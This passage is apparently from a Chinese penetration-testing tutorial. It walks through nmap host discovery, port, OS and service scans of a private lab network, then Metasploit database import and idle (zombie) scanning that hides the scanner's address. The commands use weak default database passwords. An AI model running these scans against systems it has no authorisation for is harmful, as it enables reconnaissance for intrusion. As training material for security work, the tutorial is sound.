2383/tcp open  ms-olap4
2869/tcp open  icslap
3306/tcp open  mysql
5555/tcp open  freeciv
8000/tcp open  http-alt
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds
使用TCP ACK对设备进行扫描 -PA
代码语言:javascript复制
# nmap -PA 192.168.0.106 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:05 CST
Nmap scan report for 192.168.0.106
Host is up (0.00017s latency).
Not shown: 978 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
79/tcp   open  finger
80/tcp   open  http
106/tcp  open  pop3pw
110/tcp  open  pop3
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
2383/tcp open  ms-olap4
2869/tcp open  icslap
3306/tcp open  mysql
5555/tcp open  freeciv
8000/tcp open  http-alt
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1.42 seconds
使用UDP对设备进行扫描 -PU

UDP扫描更简单,但是不如TCP方便,且慢。

代码语言:javascript复制
#nmap -PU 192.168.0.106
tarting Nmap 7.92 ( https://nmap.org ) at 2022-06-14 18:36 CST
Nmap scan report for 192.168.0.106
Host is up (0.00076s latency).
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.10 seconds
对端口进行扫描
端口种类

l公有端口(Well Know Port):0-1024

l注册端口(Registered Port):1025-49,151

l动态/私有端口(Dynamic/Private Port):49,152-65,535

端口状态

lOpen:开放状态。nmap 发起两个 SYN 的请求,服务器上监听在此端口的进程会进行应答,会返回 SYN/ACK, nmap 收到服务端返还回来的应答后会发送两个 RST ,并不会和服务端建立通信连接,完成端口的探测。

lClosed:关闭状态。nmap 发起两个 SYN 的请求,服务器上由于没有进程监听该端口,内核会返回 RST, nmap 收到服务端返还回来的 RST 报文,将探测结果定义为 closed 。

lFiltered:过滤状态。这种情况是服务端将收到的 nmap SYN 报文直接丢弃,不进行应答,由于 nmap 直接发送了两个 SYN 报文,都没有收到应答,所以认定服务端开启了防火墙,将 SYN 报文丢弃。

lUnfiltered:未过滤状态。nmap 默认进行的是 SYN 扫描,当用 -sA 选项( TCP ACK 扫描),连续发送两个同样的 ACK 报文,由于 snmp 确认收到了一个服务端根本没有发送的报文,所以服务端会发送一个 RST 报文, snmp 收到服务端发送来的 RST 报文后,确认服务端没有对报文进行丢弃处理,注意本探测不能发现端口是开放还是关闭状态,只能确认探测的报文服务端已收到,并回复给了 snmp RST报文。

lopen|filtered:开放或过滤状态。这种状态主要是nmap无法区别端口处于 open 状态还是 filtered 状态。这种状态长出现于UDP端口,参考后续 UDP 中的解释。

lclosed|filtered:关闭或者过滤状态。

扫描技术
不扫描端口 -sn
代码语言:javascript复制
# nmap -sn 192.168.0.106 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:26 CST
Nmap scan report for 192.168.0.106
Host is up (0.0011s latency).
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
代码语言:javascript复制
# nmap -sn -PE 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:27 CST
Nmap scan report for 192.168.0.106
Host is up (0.00055s latency).
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.10 seconds
代码语言:javascript复制
# nmap -sn 192.168.0.1/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:30 CST
Nmap scan report for 192.168.0.1
Host is up (0.0043s latency).
MAC Address: F4:83:CD:A6:DE:E3 (Tp-link Technologies)
Nmap scan report for 192.168.0.106
Host is up (0.00036s latency).
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap scan report for 192.168.0.151
Host is up (0.12s latency).
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)
Nmap scan report for 192.168.0.158
Host is up (0.12s latency).
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)
Nmap scan report for 192.168.0.159
Host is up (0.086s latency).
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)
Nmap scan report for 192.168.0.161
Host is up (0.00032s latency).
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Nmap scan report for 192.168.0.150
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in 2.40 seconds
SYN 半开扫描 -sS

NMAP机器àSYNà机器

机器àSYN ACKàNMAP机器

NMAP机器àRSTà机器(连接断开)

返回Open、Closed、filtered

代码语言:javascript复制
#nmap -sS 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:33 CST
Nmap scan report for 192.168.0.106
Host is up (0.0011s latency).
Not shown: 978 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
79/tcp   open  finger
80/tcp   open  http
106/tcp  open  pop3pw
110/tcp  open  pop3
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
2383/tcp open  ms-olap4
2869/tcp open  icslap
3306/tcp open  mysql
5555/tcp open  freeciv
8000/tcp open  http-alt
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1.48 seconds
Connect扫描 -sT

完成3次握手

NMAPà机器àSYNà机器

机器àSYN ACKàNMAP机器

NMAP机器àACK机器(连接建立)

代码语言:javascript复制
#nmap -sT 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:44 CST
Nmap scan report for 192.168.0.106
Host is up (0.0013s latency).
Not shown: 978 closed tcp ports (conn-refused)
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
79/tcp   open  finger
80/tcp   open  http
106/tcp  open  pop3pw
110/tcp  open  pop3
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
2383/tcp open  ms-olap4
2869/tcp open  icslap
3306/tcp open  mysql
5555/tcp open  freeciv
8000/tcp open  http-alt
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds
UDP扫描 -sU

返回Open、Open|filtered,速度很慢,filtered可能是Open,可能是Closed

代码语言:javascript复制
#nmap -sU 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:47 CST
Stats: 0:17:39 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 99.44% done; ETC: 13:05 (0:00:06 remaining)
Nmap scan report for 192.168.0.106
Host is up (0.00064s latency).
Not shown: 992 closed udp ports (port-unreach)
PORT     STATE         SERVICE
137/udp  open          netbios-ns
138/udp  open|filtered netbios-dgm
500/udp  open|filtered isakmp
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
5050/udp open|filtered mmcc
5353/udp open|filtered zeroconf
5355/udp open|filtered llmnr
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1080.72 seconds
扫描全部端口 -p "*"
代码语言:javascript复制
#nmap -p "*" 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:49 CST
Nmap scan report for 192.168.0.106
Host is up (0.0039s latency).
Not shown: 8319 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
79/tcp   open  finger
80/tcp   open  http
105/tcp  open  csnet-ns
106/tcp  open  pop3pw
110/tcp  open  pop3
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
1536/tcp open  ampr-inter
1537/tcp open  sdsc-lm
1538/tcp open  3ds-lm
1539/tcp open  intellistor-lm
1540/tcp open  rds
1552/tcp open  pciarray
1639/tcp open  cert-initiator
2224/tcp open  efi-mg
2383/tcp open  ms-olap4
2869/tcp open  icslap
3306/tcp open  mysql
5040/tcp open  unknown
5555/tcp open  freeciv
8000/tcp open  http-alt
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 3.69 seconds
扫描频率最高的n个端口 –top-ports n
代码语言:javascript复制
#nmap -top-ports 10  192.168.0.106 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:54 CST
Nmap scan report for 192.168.0.106
Host is up (0.00039s latency).
PORT     STATE  SERVICE
21/tcp   open   ftp
22/tcp   closed ssh
23/tcp   closed telnet
25/tcp   open   smtp
80/tcp   open   http
110/tcp  open   pop3
139/tcp  open   netbios-ssn
443/tcp  open   https
445/tcp  open   microsoft-ds
3389/tcp closed ms-wbt-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

扫描指定端口 -p port

代码语言:javascript复制
# nmap -p 8100 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 13:02 CST
Nmap scan report for 192.168.0.106
Host is up (0.00056s latency).
PORT     STATE SERVICE
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
扫描操作系统

nmap扫描操作系统采用主动方式,15个探针,不能正确发现,仅做推测。

最基本的扫描 -O
代码语言:javascript复制
# nmap -O 192.168.0.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 13:05 CST
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 100.00% done; ETC: 13:05 (0:00:00 remaining)
Nmap scan report for 192.168.0.161
Host is up (0.0017s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.01 seconds
尽对“具有Open和Closed的端口”进行扫描 -O --osscan-limit
代码语言:javascript复制
nmap -O --osscan-limit 192.168.0.158
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 14:37 CST
Nmap scan report for 192.168.0.158
Host is up (0.0068s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.98 seconds
猜测最接近目标端口的操作系统 -O --osscan-guest

需要root权限

代码语言:javascript复制
# nmap -O --osscan-guess 192.168.0.159
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 14:42 CST
Nmap scan report for 192.168.0.159
Host is up (0.0092s latency).
All 1000 scanned ports on 192.168.0.159 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.40 seconds
扫描目标服务
扫描技术

对端口扫描:默认用SYN进行扫描

对服务识别:发出探针报文,返回确认值,确认服务

对版本识别:发出探针报文,返回报文信息,分析出服务的版本

扫描服务 -sV
代码语言:javascript复制
# nmap -sV 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-15 10:19 CST
Nmap scan report for 192.168.0.106
Host is up (0.00034s latency).
Not shown: 985 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp   open  httpMicrosoft HTTPAPI httpd 2.0 (SSDP/UPnP)
135/tcp  open  msrpc   Microsoft Windows RPC
139/tcp  open  netbios-ssn Microsoft Windows netbios-ssn
443/tcp  open  ssl/httpApache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.28)
445/tcp  open  microsoft-ds?
902/tcp  open  ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
912/tcp  open  vmware-auth VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
1433/tcp open  ms-sql-sMicrosoft SQL Server 2014 12.00.2269
2383/tcp open  ms-olap4?
3000/tcp open  ppp?
3306/tcp open  mysql   MariaDB (unauthorized)
5555/tcp open  freeciv?
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
8080/tcp open  httpApache Tomcat/Coyote JSP engine 1.1
8100/tcp open  httpApache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.28)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
=====NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)=======
SF-Port3000-TCP:V=7.92%I=7%D=6/15%Time=62A941D5%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1.1x20400x20Badx20RequestrnContent-Type:x20t
SF:ext/plain;x20charset=utf-8rnConnection:x20closernrn400x20Badx
SF:20Request")%r(GetRequest,174,"HTTP/1.0x20302x20FoundrnCache-Contro
SF:l:x20no-cachernContent-Type:x20text/html;x20charset=utf-8rnExpir
SF:es:x20-1rnLocation:x20/loginrnPragma:x20no-cachernSet-Cookie:
SF:x20redirect_to=/;x20Path=/;x20HttpOnly;x20SameSite=LaxrnX-Conten
SF:t-Type-Options:x20nosniffrnX-Frame-Options:x20denyrnX-Xss-Protect
SF:ion:x201;x20mode=blockrnDate:x20Wed,x2015x20Junx202022x2002:20
SF::09x20GMTrnContent-Length:x2029rnrn
SF:/a>.nn")%r(Help,67,"HTTP/1.1x20400x20Badx20RequestrnContent-Ty
SF:pe:x20text/plain;x20charset=utf-8rnConnection:x20closernrn400
SF:x20Badx20Request")%r(HTTPOptions,12E,"HTTP/1.0x20302x20FoundrnCac
SF:he-Control:x20no-cachernExpires:x20-1rnLocation:x20/loginrnPra
SF:gma:x20no-cachernSet-Cookie:x20redirect_to=/;x20Path=/;x20HttpO
SF:nly;x20SameSite=LaxrnX-Content-Type-Options:x20nosniffrnX-Frame-O
SF:ptions:x20denyrnX-Xss-Protection:x201;x20mode=blockrnDate:x20We
SF:d,x2015x20Junx202022x2002:20:14x20GMTrnContent-Length:x200rn
SF:rn")%r(RTSPRequest,67,"HTTP/1.1x20400x20Badx20RequestrnContent-T
SF:ype:x20text/plain;x20charset=utf-8rnConnection:x20closernrn400
SF:x20Badx20Request")%r(SSLSessionReq,67,"HTTP/1.1x20400x20Badx20Req
SF:uestrnContent-Type:x20text/plain;x20charset=utf-8rnConnection:x2
SF:0closernrn400x20Badx20Request")%r(TerminalServerCookie,67,"HTTP/1
SF:.1x20400x20Badx20RequestrnContent-Type:x20text/plain;x20charset
SF:=utf-8rnConnection:x20closernrn400x20Badx20Request")%r(TLSSess
SF:ionReq,67,"HTTP/1.1x20400x20Badx20RequestrnContent-Type:x20text/
SF:plain;x20charset=utf-8rnConnection:x20closernrn400x20Badx20Re
SF:quest")%r(Kerberos,67,"HTTP/1.1x20400x20Badx20RequestrnContent-Ty
SF:pe:x20text/plain;x20charset=utf-8rnConnection:x20closernrn400
SF:x20Badx20Request")%r(FourOhFourRequest,1A1,"HTTP/1.0x20302x20Found
SF:rnCache-Control:x20no-cachernContent-Type:x20text/html;x20charset
SF:=utf-8rnExpires:x20-1rnLocation:x20/loginrnPragma:x20no-cache
SF:rnSet-Cookie:x20redirect_to=/nice%20ports%2C/Tri%6Eity.txt
SF:%2ebak;x20Path=/;x20HttpOnly;x20SameSite=LaxrnX-Content-Type-Opt
SF:ions:x20nosniffrnX-Frame-Options:x20denyrnX-Xss-Protection:x201;
SF:x20mode=blockrnDate:x20Wed,x2015x20Junx202022x2002:20:40x20GMT
SF:rnContent-Length:x2029rnrn
SF:);
===NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)=======
SF-Port5555-TCP:V=7.92%I=7%D=6/15%Time=62A941D5%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,138,"HTTP/1.0x20200x20OKrnCache-Control:x20no-cacher
SF:nPragma:x20no-cachernExpires:x200rncharset:x20UTF8rnX-Frame-Op
SF:tions:x20DENYrnX-XSS-Protection:x201;x20mode=blockrnX-Content-Ty
SF:pe-Options:x20nosniffrnContent-Type:x20text/htmlrnrn{"STATUS"
SF::x20"REDIRECT",x20"RESPONSE":x20"mlogin.html",x20"ExtendedR
SF:esponse":x20[{"last_notification_change_ts"x20:x20""}]}")%r(G
SF:etRequest,2D,"HTTP/1.0x20302x20FoundrnLocation:x20mlogin.htmlr
SF:nrn")%r(HTTPOptions,2D,"HTTP/1.0x20302x20FoundrnLocation:x20mlo
SF:gin.htmlrnrn")%r(RTSPRequest,2D,"HTTP/1.0x20302x20FoundrnLoca
SF:tion:x20mlogin.htmlrnrn")%r(FourOhFourRequest,6E,"HTTP/1.1x2040
SF:4x20Notx20FoundrnCache-Control:x20max-age=3600,x20must-revalidate
SF:rnExpires:x20Thu,x2015x20Junx202023x2002:21:07x20GMTrn")%r(SI
SF:POptions,138,"HTTP/1.0x20200x20OKrnCache-Control:x20no-cachernP
SF:ragma:x20no-cachernExpires:x200rncharset:x20UTF8rnX-Frame-Opti
SF:ons:x20DENYrnX-XSS-Protection:x201;x20mode=blockrnX-Content-Type
SF:-Options:x20nosniffrnContent-Type:x20text/htmlrnrn{"STATUS":
SF:x20"REDIRECT",x20"RESPONSE":x20"mlogin.html",x20"ExtendedRes
SF:ponse":x20[{"last_notification_change_ts"x20:x20""}]}");
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 132.23 seconds
nmap组合扫描
代码语言:javascript复制
# nmap -Pn -sS 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-20 12:35 CST
Nmap scan report for 192.168.0.106
Host is up (0.00014s latency).
Not shown: 985 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
2383/tcp open  ms-olap4
3000/tcp open  ppp
3306/tcp open  mysql
5555/tcp open  freeciv
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)


Nmap done: 1 IP address (1 host up) scanned in 1.62 seconds
代码语言:javascript复制
# nmap -Pn -sS -A 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-20 12:40 CST
Nmap scan report for 192.168.0.106
Host is up (0.00029s latency).
Not shown: 985 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp   open  httpMicrosoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
135/tcp  open  msrpc   Microsoft Windows RPC
139/tcp  open  netbios-ssn Microsoft Windows netbios-ssn
443/tcp  open  ssl/httpApache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.28)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
| http-title: Welcome to XAMPP
|_Requested resource was https://192.168.0.106/dashboard/
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds?
902/tcp  open  ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
912/tcp  open  vmware-auth VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
1433/tcp open  ms-sql-sMicrosoft SQL Server 2014 12.00.2269.00; RTM 
| ms-sql-ntlm-info: 
|   Target_Name: DESKTOP-9A8VFKB
|   NetBIOS_Domain_Name: DESKTOP-9A8VFKB
|   NetBIOS_Computer_Name: DESKTOP-9A8VFKB
|   DNS_Domain_Name: DESKTOP-9A8VFKB
|   DNS_Computer_Name: DESKTOP-9A8VFKB
|_  Product_Version: 10.0.17763
|_ssl-date: 2022-06-20T04:43:40 00:00;  10s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-06-20T02:24:59
|_Not valid after:  2052-06-20T02:24:59
2383/tcp open  ms-olap4?
3000/tcp open  ppp?
…
将扫描结果存为XML文件名和数据库
将扫描结果存为XML文件名
代码语言:javascript复制
#nmap -oX nmap.xml 192.168.0.106
tarting Nmap 7.92 ( https://nmap.org ) at 2022-06-15 10:25 CST
Nmap scan report for 192.168.0.106
Host is up (0.00023s latency).
Not shown: 985 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
2383/tcp open  ms-olap4
3000/tcp open  ppp
3306/tcp open  mysql
5555/tcp open  freeciv
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)


Nmap done: 1 IP address (1 host up) scanned in 1.55 seconds
#cat nmap.xml 




…
将扫描结果存为metasploit数据库

1)先导入XML文件中

代码语言:javascript复制
#nmap -Pn -sS -A -oX nmap.xml 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-21 13:30 CST
Nmap scan report for 192.168.0.106
Host is up (0.00071s latency).
All 1000 scanned ports on 192.168.0.106 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1   0.71 ms 192.168.0.106
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.18 seconds

2)再导入数据库中

代码语言:javascript复制
msf6 > db_import /home/jerry/nmap.xml
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.13.1'
[*] Importing host 192.168.0.106
[*] Successfully imported /home/jerry/nmap.xml
msf6 > hosts -c address
Hosts
=====
address
-------
192.168.0.106
192.168.0.155

msf 也可以和mysql 一起工作,在bt5r1中msf 默认支持连接mysql:

代码语言:javascript复制
msf> db_driver mysql
msf> db_connect root:123456@127.0.0.1/msf3 #连接本机mysql 的msf3 数据库

mysql 默认密码123456,使用db_connect 连接时会自动创建msf3 库

metasploit使用数据库扫描

简介
代码语言:javascript复制
#/etc/init.d/postgresql start
Starting postgresql (via systemctl): postgresql.service.
# msfconsole
msf> db_connect postgres:123456@127.0.0.1/msf(初始化为postgres:toor)
[*] Connected to Postgres data service: 127.0.0.1/msf 
msf> db_status
[*] Connected to msf. Connection type: postgresql.
TCP空闲扫描

找到空闲机器,利用空闲机扫描,好像不在本机上执行

空闲机器IPID, 使用IP帧标识机制的空闲机器

代码语言:javascript复制
msf6 > use auxiliary/scanner/ip/ipidseq
msf6 auxiliary(scanner/ip/ipidseq) > options
Module options (auxiliary/scanner/ip/ipidseq):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
INTERFACEno   The name of the interface
RHOSTS   yes   The target host(s), see https://github.com/rapid7/met
 asploit-framework/wiki/Using-Metasploit
RPORT  80 yes   The target port
SNAPLEN65535  yes   The number of bytes to capture
THREADS1 yes   The number of concurrent threads (max one per host)
TIMEOUT500   yes   The reply read timeout in milliseconds
msf6 auxiliary(scanner/ip/ipidseq) > set rhost 192.168.0.0/24
rhost => 192.168.0.0/24
可以设置
set rhost 192.168.0.0/24
或
set rhost 192.168.0.0-199
或
set rhost File://path/xxx.txt
msf6 auxiliary(scanner/ip/ipidseq) > set threads 50
threads => 50
windows:1-16
Unix:1-128
msf6 auxiliary(scanner/ip/ipidseq) > run
[*] 192.168.0.1's IPID sequence class: All zeros
[*] Scanned  82 of 256 hosts (32% complete)
[*] Scanned  83 of 256 hosts (32% complete)
[*] Scanned  98 of 256 hosts (38% complete)
[*] 192.168.0.106's IPID sequence class: Incremental!
[*] Scanned 103 of 256 hosts (40% complete)
[*] 192.168.0.161's IPID sequence class: All zeros
[*] 192.168.0.158's IPID sequence class: Incremental!
[*] 192.168.0.152's IPID sequence class: Randomized
[*] 192.168.0.151's IPID sequence class: Incremental!
[*] 192.168.0.159's IPID sequence class: All zeros
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 169 of 256 hosts (66% complete)
[*] Scanned 183 of 256 hosts (71% complete)
[*] Scanned 212 of 256 hosts (82% complete)
[*] Scanned 232 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed 
msf6 auxiliary(scanner/ip/ipidseq) >

扫描到状态为Incremental!

试图通过192.168.0.151向192.168.0.161发包

代码语言:javascript复制
msf6 auxiliary(scanner/ip/ipidseq) > nmap -PN -sI 192.168.0.151 192.168.0.161
[*] exec: nmap -PN -sI 192.168.0.151 192.168.0.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 16:18 CST
Idle scan using zombie 192.168.0.151 (192.168.0.151:80); Class: Incremental
Even though your Zombie (192.168.0.151; 192.168.0.151) appears to be vulnerable to IP ID sequence prediction (class: Incremental), our attempts have failed.  This generally means that either the Zombie uses a separate IP ID base for each host (like Solaris), or because you cannot spoof IP packets (perhaps your ISP has enabled egress filtering to prevent IP spoofing), or maybe the target network recognizes the packet source as bogus and drops them
QUITTING!

试图通过192.168.0.106向192.168.0.161发包

代码语言:javascript复制
msf6 auxiliary(scanner/ip/ipidseq) > nmap -PN -sI 192.168.0.106 192.168.0.161
[*] exec: nmap -PN -sI 192.168.0.106 192.168.0.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 16:20 CST
Idle scan zombie 192.168.0.106 (192.168.0.106) port 80 cannot be used because it has not returned any of our probes -- perhaps it is down or firewalled.
QUITTING!

不用自身IP地址项目表机器发送数据包,就可以获得目标主机的开放端口

在MSF终端中执行nmap
代码语言:javascript复制
msf6 > db_connect postgres:123456@127.0.0.1/msf
msf6 > db_nmap -sS -A 192.168.0.106
msf6> services u #查看扫描结果
msf6 > services -u
Services
========


host           port  proto  name             state  info
----           ----  -----  ----             -----  ----
192.168.0.106  21    tcp    ftp              open   FileZilla ftpd 0.9.41 beta
192.168.0.106  25    tcp    smtp             open   Mercury/32 smtpd Mail server account Maiser
192.168.0.106  79    tcp    finger           open   Mercury/32 fingerd
192.168.0.106  80    tcp    http             open   Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
192.168.0.106  106   tcp    pop3pw           open   Mercury/32 poppass service
192.168.0.106  110   tcp    pop3             open   Mercury/32 pop3d
192.168.0.106  135   tcp    msrpc            open   Microsoft Windows RPC
192.168.0.106  139   tcp    netbios-ssn      open   Microsoft Windows netbios-ssn
192.168.0.106  143   tcp    imap             open   Mercury/32 imapd 4.62
192.168.0.106  443   tcp    ssl/http         open   Apache httpd 2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
192.168.0.106  445   tcp    microsoft-ds     open
